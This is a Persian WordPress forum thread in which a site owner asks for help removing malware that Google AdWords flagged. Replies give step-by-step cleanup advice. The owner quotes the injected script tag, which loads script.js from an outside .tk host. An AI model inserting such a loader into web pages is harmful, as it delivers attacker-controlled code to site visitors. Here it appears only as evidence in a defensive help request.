amir2o16

حذف بد افزار در سایت

3 پست در این موضوع قرار دارد

با سلام . وب سایتم  توسط یک کد اسکریپت بدافزار به مشکل بر خورده 

جستجو های زیادی کردم . حتی مجبور شدم پلاگین امنیتی (لایسنس دار ) تهیه کنم . اما مشکلم رفع نشد . با هاستینگمم تماس گرفتم اما کد مخربی رو نتونستن پیدا کنم . مشکل اصلیه من اینه که گوگل اد وورز بهم ارور میده و میگه ویروس داری . کلی هم سرچ کردم حتی مجبور شدم فایلاها و دیتابیس هاستمو به کلی پاک کنم. اما بازم به مشکل میخورم . از گوگل وب مستر هم نتونستم مشکلمو بر طرف کنم

توضیحات بیشتر راجب نوع بد افزاری که داخل وب سایتمه = https://sitecheck.sucuri.net/results/ir-blumen.com

اسکریپی که فایل هرز داخلشه اما نمیتونم مکانشو پیدا کنم  : <script type='text/javascript' src='https://stats.startreceive.tk/script.js?pr=1'>

- اگه امکانش هست کمکم کنید . ممنونم

 

تصویر ارور گوگل اد وورزو ضمیمه کردم 

photo_2018-04-15_06-56-36.jpg

0

به اشتراک گذاری این پست


لینک به پست

به ترتیب کارهای زیر رو انجام بدید :

1- فایل های روت وردپرس + فولدر های wp-admin , wp-include رو مجددا از سایت رسمی وردپرس دانلود و جایگزین کنید .

2- در فولدر wp-content فولدرها و فایل های مربوط به افزونه کش رو حذف کنید . پوشه پلاگین ها رو تغییر نام بدید .

3- قالبتون رو هم به قالب پبش فرض وردپرس تغییر بدید .

بعد از انجام این کارها تست کنید ببینید مشکل هنوز برقرار هست یا نه .

اگر مشکل برطرف شده بود شما باید اول قالب رو به قالب معمول سایت تغییر بدید و مجددا تست کنید . بعدش باید دونه دونه پلاگین ها رو فعال و مجددا تست کنید . تا در نهایت اسکریپت مخرب رو شناسایی کنید 

ویرایش شده در توسط نوین ادمین
3

به اشتراک گذاری این پست


لینک به پست

سعی کنید افزونه ها و قالب های خودتون رو بروز رسانی کنید و افزونه های تجاری بخصوص قالب رو رایگان دریافت نکنید

0

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط Worldword
      سلام. وقت بخیر
      اگر خطایی در کدهای css وجود داشته باشه ، میتونه از نظر امنیتی یک سایت رو مورد تهدید قرار  بده؟
      اگر افزونه ای از نظر امنیتی مشکل داشته باشه ، اما غیرفعال باشه ، باز هم خطری وجود داره؟
    • توسط comp90
      سلام و عرض ادب:
      بنده قصد دارم تا کپچای گوگل را در صفحاتی چون ورود و ثبت نام و صفحات دلخواه دیگر فعال کنم.
      برای امتحان افزونه Advanced noCaptcha را از منبع وردپرس دانلود و نصب نمودم، حتی تنظیمات هم به درستی انجام شد اما وقتی تیک نمایش در صفحه عضویت را می زنم، کپچا در قالب نمایش داده نمی شود.
       
      ممنون میشم راهنمایی کنید
    • توسط m3hrdaad
      با سلام.
      من یک فروشگاه دانلود فایل دارم که که دو تا هاست خریداری کردم. یکی از این هاست ها، هاست دانلود است که من فایل هامو توش آپلود میکنم و لینک آپلود را به محصولات (که در هاست دیگری هستند) تخصیص میدم. تا به اینجای کار همه چیز اوکی هست. منتها چون نام فایل های من از یک ساختار خاصی تبعیت می کنن، یک کاربر میتونه به راحتی حدس بزنه نام فایل های منو. به عنوان مثال من یک فایل دارم با اسم dc-0001 که مربوط به مجموعه dc است. این مجموعه اگر 3 تا فایل دیگه داشته باشه، میشن dc-0002 و dc-0003. کاربر به راحتی میتونه آدرس زیر و بزنه و دانلود کنه فایل و بدون خرید!!!!!
      dl.XXXXXX.ir/dc-0001.pdf
      dl.XXXXXX.ir/dc-0002.pdf
      dl.XXXXXX.ir/dc-0003.pdf
      البته این نکته رو بگم وقتی که من این لینک بالا رو به محصولات میدم، یک کاربری که محصول و خریداری کنه و بعد بره از سایت برای دانلود، لینک به صورت hashkey شده وجود داره که قابلیت حدس زدم بقیه نام ها نیست. ولی خوب شاید هم کسی پیدا بشه، اصلا بدون خرید بخواد وارد فایل هام بشه.
      سوال من بحث امنیت هاست دانلود است. چجوری میشه فایل ها رو hashkey کرد و یا اینکه اصلا دسترسی مستقیم کاربران رو به هاست دانلود، مسدود کرد؟
      مثلا سایت های soft98.ir یا downloadha.ir یک هاست دانلود هم دارن که کاربر عملا دسترسی به مشاهده این هاست دانلودشون نداره
    • توسط ghorbanih91
      سلام دوستان یه مشکل خیلی ناجور دارم که بدجوری روانمو داغون کرده لطفا یکی یه کمکی برسونه
      هر چند وقت یه بار ایمیل و نام مدیر تغییر پیدا میکنه(قطعا کسی به روشی به سایت نفوذ میکنه) و من مجبور میشم برم از پی اچ پی مای ادمین اطلاعات رو درست کنم.. حتی رو یه سایت دیگه همین مشکل رو داشتم نسخه پرمیوم آیتم سکوریتی رو هم نصب کردم باز همین مشکل وجود داشت.
      لطفا از دوستان اگه کسی تجربه ای در این زمینه داره بگه
    • توسط gust
      سلام دوستان من یه مشکلی دارم قالب Entrada نصب شده و الان میخوام افزونه اضافه کنم یا ویرایش کنم با اینکه ادمینم امکانش نیست دسترسی به هاستم دارم منتهی اونجام چیزی پیدا نکردم لطفا راهنماییم کنید